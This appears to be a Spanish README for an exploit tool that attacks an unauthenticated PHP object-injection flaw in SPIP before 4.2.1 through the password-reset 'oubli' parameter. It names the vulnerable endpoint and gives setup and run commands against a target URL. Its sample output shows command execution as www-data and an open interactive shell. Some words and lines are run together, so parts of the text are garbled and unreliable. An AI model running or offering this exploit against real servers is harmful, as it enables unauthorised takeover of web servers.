
Vulnerabilidad de ejecución remota de código no autenticada en SPIP anterior a 4.2.1.
Vulnerabilidad de ejecución remota de código sin autenticación en SPIP anterior a 4.2.1. El parámetro
oublien el formulario de restablecimiento de contraseña es vulnerable a la inyección de objetos PHP debido a una deserialización mal gestionada. Una carga útil serializada especialmente diseñada se ejecuta en el servidor como el usuario web, y la salida se refleja en la respuesta dentro del valor del campo de entradaoubli.
/spip.php?page=spip_pass.oubli.value reflejado en la respuesta.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
Ejemplo:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data